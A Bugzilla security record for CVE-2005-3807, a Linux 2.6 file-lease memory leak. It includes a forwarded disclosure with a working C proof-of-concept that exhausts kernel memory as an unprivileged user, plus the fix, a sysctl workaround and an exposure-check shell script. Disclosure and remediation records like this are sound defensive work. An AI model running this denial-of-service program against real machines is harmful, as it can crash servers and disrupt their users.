Bugzilla – Bug 133803
VUL-0: CVE-2005-3807: kernel: file leases lead to oom
Last modified: 2021-12-06 12:15:52 UTC
We received the following report via vendor-sec. The issue is public.

Date: Mon, 14 Nov 2005 10:43:29 -0800
From: Chris Wright <chrisw@osdl.org>
To: vendor-sec@lst.de
Subject: [vendor-sec] [avi@argo.co.il: local denial-of-service with file leases]

Memory leak easily triggered by normal samba usage.

Fix:
http://kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff_plain;h=dc15ae14e97ee9d5ed740cbb0b94996076d8b37e;hp=9e6c67fd2716720d9029d38ea25884efcfdedeb6

thanks,
-chris

----- Forwarded message from Avi Kivity <avi@argo.co.il> -----

Date: Thu, 10 Nov 2005 19:00:46 +0200
From: Avi Kivity <avi@argo.co.il>
To: linux-kernel <linux-kernel@vger.kernel.org>
Subject: local denial-of-service with file leases
User-Agent: Mozilla Thunderbird 1.0.7-1.1.fc4 (X11/20050929)

the following program will oom the 2.6.14.1 kernel, running as an ordinary user:

#include <stdio.h>      /* perror() needs this header; not in the original post */
#include <unistd.h>
#include <stdlib.h>
#include <linux/fcntl.h>

int main(int ac, char **av)
{
    char *fname = av[0];
    int fd = open(fname, O_RDONLY);
    int r;

    /* take and drop a read lease on the same fd forever */
    while (1) {
        r = fcntl(fd, F_SETLEASE, F_RDLCK);
        if (r == -1) {
            perror("F_SETLEASE, F_RDLCK");
            exit(1);
        }
        r = fcntl(fd, F_SETLEASE, F_UNLCK);
        if (r == -1) {
            perror("F_SETLEASE, F_UNLCK");
            exit(1);
        }
    }
    return 0;
}

it will suck all available memory into fasync_cache, causing an oom.

a workaround is to set fs.leases-enable to 0.

this has already been reported to lkml[1] and fedora[2], with no effect.

[1] http://www.ussg.iu.edu/hypermail/linux/kernel/0510.2/1589.html
[2] https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=172691

----- End forwarded message -----
Ludwig, is it enough to fix this bug for HEAD?
Well, if "normal" (i.e. not even malicious) samba usage can kill your shiny suse linux server, I vote for fixing it in all affected kernels.
SLES9, SL92 are _not_ affected. Committed to SL93, SL100, HEAD.
======================================================
Name: CVE-2005-3807
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3807
Reference: CONFIRM:http://kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=dc15ae14e97ee9d5ed740cbb0b94996076d8b37e

Memory leak in the VFS file lease handling in locks.c in Linux kernels 2.6.10 to 2.6.15 allows local users to cause a denial of service (memory exhaustion) via certain Samba activities that cause an fasync entry to be re-allocated after the fasync queue has already been cleaned.
CVE-2005-3807: CVSS v2 Base Score: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
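As an added example (not from this bug, the reporter, or the kernel tree), a POSIX shell check that combines the affected range stated in the CVE entry above (2.6.10 to 2.6.15) with the fs.leases-enable workaround from the forwarded report. It assumes /proc/sys/fs/leases-enable exists on the host and that a distro-suffixed `uname -r` such as 2.6.13-default carries the upstream version before the dash.

```shell
#!/bin/sh
# Added example: assess CVE-2005-3807 exposure on a host.
# Version window 2.6.10..2.6.15 comes from the CVE text; the
# fs.leases-enable=0 workaround comes from Avi Kivity's report.

# Return 0 if "$1" (e.g. 2.6.14.1 or 2.6.13-default) is a 2.6 kernel
# whose patch level lies in the affected window, else 1.
kernel_in_affected_range() {
    ver=${1%%-*}                    # drop a distro suffix like -default
    case "$ver" in
        2.6.*) ;;
        *) return 1 ;;              # 2.4.x, 2.6 without patch level, etc.
    esac
    patch=$(printf '%s\n' "$ver" | cut -d. -f3)
    case "$patch" in ''|*[!0-9]*) return 1 ;; esac
    if [ "$patch" -ge 10 ] && [ "$patch" -le 15 ]; then
        return 0
    fi
    return 1
}

# Return 0 if sysctl value "$1" (contents of fs.leases-enable)
# disables leases, i.e. the workaround from the report is in place.
leases_disabled() {
    [ "$1" = 0 ]
}

# Combine both checks; prints not-affected, mitigated or exposed.
assess() {
    if ! kernel_in_affected_range "$1"; then
        echo not-affected
    elif leases_disabled "$2"; then
        echo mitigated
    else
        echo exposed
    fi
}

# Live check on the current host (assumed Linux with /proc mounted).
check_host() {
    kver=$(uname -r)
    leases=$(cat /proc/sys/fs/leases-enable 2>/dev/null || echo unknown)
    echo "kernel=$kver fs.leases-enable=$leases status=$(assess "$kver" "$leases")"
}
```

The version test is only a heuristic for distribution kernels, which carry backported fixes and their own patch levels (the thread already records SLES9 as not affected and SL93/SL100 as fixed), so treat the sysctl value as the reliable part and the vendor advisory as authoritative.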